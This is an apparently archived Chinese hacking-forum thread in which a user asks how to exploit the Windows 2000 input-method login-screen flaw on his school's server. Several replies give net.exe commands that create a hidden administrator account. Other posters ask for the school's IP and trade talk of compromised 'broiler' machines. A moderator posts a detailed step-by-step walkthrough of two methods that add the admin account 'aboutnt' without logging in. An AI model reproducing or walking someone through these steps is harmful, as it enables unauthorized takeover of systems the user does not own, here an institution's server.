|
 | 作者: jjffk [jjffk]
 论坛用户 |
登录 |
| 今天发现学校里的一太2000的server 有输入法漏洞 怎么利用啊 |
| 地主 发表时间: 05/14 20:03 |
 | 回复: dormouse [dormouse]  论坛用户 |
登录 |
|
网上这样的问题多的是啊。多看多练啊。 |
| B1层 发表时间: 05/14 20:35 |
 | 回复: drckness [drckness] 论坛用户 |
登录 |
|
找帮助,跳转URL, 如果在C盘就输入下面字符 C:\WINNT\SYSTEM32\NET.EXE USER TT 111 /ADD C:\WINNT\SYSTEM32\NET.EXE LOCALGROUP ADMINISTRATORS TT /ADD 这样你就有了一个USER:TT PASS:11 的超管。进去就行了。嘿嘿 |
| B2层 发表时间: 05/14 20:40 |
 | 回复: vishx [vishx] 论坛用户 |
登录 |
|
靠,3389哦,你发了!你们学校IP是多少?我的QQ:7667593,加我好吗? |
| B3层 发表时间: 05/14 21:06 |
 | 回复: napolun [napolun]  版主 |
登录 |
|
不是吧,雨翼兄,学校机子你也打主意??开3389的机子不少啊。 |
| B4层 发表时间: 05/14 22:05 |
| 回复: jjffk [jjffk] 论坛用户 |
登录 |
|
靠 是内部网啊 没什么好玩的 |
| B5层 发表时间: 05/14 22:19 |
| 回复: vishx [vishx] 论坛用户 |
登录 |
|
没办法啊~我现在缺肉鸡 |
| B6层 发表时间: 05/15 16:24 |
 | 回复: hacker521 [hacker521] 论坛用户 |
登录 |
|
找我要哟,你要吗 |
| B7层 发表时间: 05/15 17:05 |
| 回复: jjffk [jjffk] 论坛用户 |
登录 |
|
c:\winnt\system32\net.exe user tt dd /add c:\winnt\system32\net.exe localgroup administrators tt /add 玩了后 用 tt 密码dd 还是进不去啊 |
| B8层 发表时间: 05/19 20:35 |
| 回复: jjffk [jjffk] 论坛用户 |
登录 |
|
c:\winnt\system32\net.exe user tt dd /add c:\winnt\system32\net.exe localgroup administrators tt /add 玩了后 用 tt 密码dd 还是进不去啊 |
| B9层 发表时间: 05/20 23:50 |
| 回复: drckness [drckness] 论坛用户 |
登录 |
|
晕。我说的是URL后建立快捷方式! 然后再输 如有什么不明白去我的小站 http://drckness.jahee.com/ |
| B10层 发表时间: 05/21 00:53 |
| 回复: vishx [vishx] 论坛用户 |
登录 |
|
跳过了URL后,找到NET.EXE,在里面 c:\winnt\system32\net.exe user tt dd /add c:\winnt\system32\net.exe localgroup administrators tt /add |
| B11层 发表时间: 05/21 15:19 |
| 回复: jjffk [jjffk] 论坛用户 |
登录 |
|
我按你门的做了,还是不行。我确信我都打真确了 |
| B12层 发表时间: 05/29 19:47 |
 | 回复: qinghe521 [qinghe521]  论坛用户 |
登录 |
|
帅,冲啊 |
| B13层 发表时间: 05/29 19:54 |
| 回复: jjffk [jjffk] 论坛用户 |
登录 |
|
还有nt server 都在一个盘里 |
| B14层 发表时间: 05/29 20:08 |
| 回复: napolun [napolun] 版主 |
登录 |
|
输入法漏洞可以说是中文Windows2000推出后的第一个致命漏洞,通过它我们可以做许多的事情,包括建立用户. 我将网上的一些关于如何通过这个漏洞建立用户的收集整理了几种,以备管理员朋友们不时之需.:) 一、使用文件类型编辑创建管理员用户开机到登陆界面 1.调出输入法,如全拼->帮助->操作指南,跳出输入法指南帮助文件 2.右击"选项"按钮,选择"跳至url" 3.在跳至URL上添上"c:\",其它的也可. 4.帮助的右边会进入c:5.按帮助上的"选项"按钮. 6.选"internet"选项.会启动文件类型编辑框. 7.新建一个文件类型,如一个you文件类型,在跳出的文件后缀中添上"you".确定. 8.选中文件类型框中的"you"文件类型,点击下面的"高级按钮",会出现文件操作对话框. 9.新建一种文件操作,操作名任意写,如"ppp" 10.该操作执行的命令如下: C:\WINNT\system32\cmd.exe /c net user aboutnt 123456 /add & C:\WINNT\system32\cmd.exe /c net localgroup administrators aboutnt /add 完成后退出 11.将c:\的某个文件如"ppp.txt"改为"ppp.txt.you",然后双击打开这个文件. 12.通常这个文件是打不开的,系统运行一会便没有了提示,但这时我们已经将用户aboutnt加上了,权限是管理员. 13.返回,重新以aboutnt用户登录即可。 二、使用快捷方式创建管理员用户1-4步与第一种同。 5.右击c:\下的任一文件或文件夹,如右击Winnt文件夹,创建它的快捷方式:"快捷方式 WINNT". 6.右击"快捷方式 WINNT"文件->"属性"->"快捷方式"标签,将目标修改为"c:\winnt\system32\net.exe user aboutnt 123456 /add",起始位置修改为"c:\winnt\system32".确定退出."快捷方式 WINNT"文件的图标会由一个文件夹变成一个dos窗口. 7.右击"快捷方式 WINNT",运行它,创建"aboutnt"用户 8.重复6步,将目标修改为"c:\winnt\system32\net.exe localgroup administrators aboutnt /add",起始位置修改为"c:\winnt\system32".确定退出. 9.右击"快捷方式 WINNT",运行它,将"Aboutnt"用户加入了本地管理员组中. 10.删除"快捷方式 WINNT"文件,返回,以以aboutnt用户登录即可. |
| B15层 发表时间: 05/29 21:37 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 有漏洞!